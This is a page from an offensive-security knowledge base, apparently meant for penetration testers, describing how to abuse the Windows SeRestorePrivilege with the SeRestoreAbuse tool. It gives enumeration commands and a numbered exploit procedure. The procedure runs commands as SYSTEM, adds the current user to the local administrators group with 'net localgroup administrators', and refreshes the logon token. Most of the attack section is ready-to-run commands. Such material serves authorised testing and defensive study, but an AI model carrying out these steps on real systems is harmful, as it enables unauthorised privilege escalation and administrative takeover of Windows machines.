Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeRestorePrivilege

SeRestoreAbuse

SeRestoreAbuse is a focused tool for abusing SeRestorePrivilege to execute a command as SYSTEM.

This path is useful when the privilege is present but manually crafting a restore-based overwrite would be slower or less reliable.

When enumerating SeRestoreAbuse opportunities, try to identify:

  • SeRestorePrivilege in the current token
  • Writable staging path
  • Command to execute
  • Whether the action changes group membership or spawns a shell
  • Whether the target endpoint will block unsigned tooling

Enumeration

Confirm the privilege:

whoami /priv

Confirm a writable output path:

echo test > C:\Users\Public\restore_test.txt

Interesting findings include:

  • SeRestorePrivilege present
  • Tool execution is allowed
  • Output file confirms SYSTEM execution

Once confirmed, execute a controlled command first before running a full payload.

Exploit

  1. Run a proof command:
SeRestoreAbuse.exe "cmd /c whoami > C:\Users\Public\restore.txt"
  1. Confirm execution:
type C:\Users\Public\restore.txt
  1. Add the current user to local administrators if permitted:
SeRestoreAbuse.exe "cmd /c net localgroup administrators <user> /add"
  1. Refresh the logon token.
klist purge

Sign out and back in, or create a fresh session.